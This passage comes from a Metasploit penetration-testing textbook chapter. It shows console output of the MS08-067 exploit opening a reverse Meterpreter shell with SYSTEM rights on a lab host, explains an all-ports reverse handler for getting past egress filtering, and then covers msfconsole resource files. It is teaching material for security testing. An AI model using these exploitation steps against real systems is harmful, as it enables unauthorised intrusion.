72
Chapter 5
msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.33.129:1
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:1 -> 192.168.33.130:1047)
msf exploit(ms08_067_netapi) >
sessions -l -v
Active sessions
===============
Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter NT AUTHORITY\SYSTEM @ IHAZSECURITY 192.168.33.129:1 -> 192.168.33.130:1047
exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Notice that we do not set an
LPORT
; instead, we use
allports
because we
are going to try to connect out of the network on each port until we find an
open one. If you look closely at you will see that our attacker machine is
bound to
:1
(all ports) and that it finds a port outbound on port 1047 on
the target network.
Resource Files
Resource files
are script files that automate commands within
msfconsole
. They
contain a list of commands that are executed from
msfconsole
and run sequen-
tially. Resource files can greatly reduce testing and development times, allow-
ing you to automate many repetitive tasks, including exploitation.
Resource files can be loaded from
msfconsole
with the
resource
command, or
they can be passed as a command-line argument with the
-r
switch.
The simple example shown next creates a resource file that displays our
Metasploit version and then loads the sounds plug-in:
root@bt:/opt/framework3/msf3/
echo version > resource.rc
root@bt:/opt/framework3/msf3/
echo load sounds >> resource.rc
root@bt:/opt/framework3/msf3/
msfconsole -r resource.rc
resource (resource.rc)> version
Framework: 3.7.0-dev.12220
Console : 3.7.0-dev.12220
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf >
As you can see at and , the
version
and
load sounds
commands are
echoed into a text file called
resource.rc
. This file is then passed to
msfconsole
at
the command line at with the
-r
switch, and when the file begins to load, the
commands are executed at from the resource file.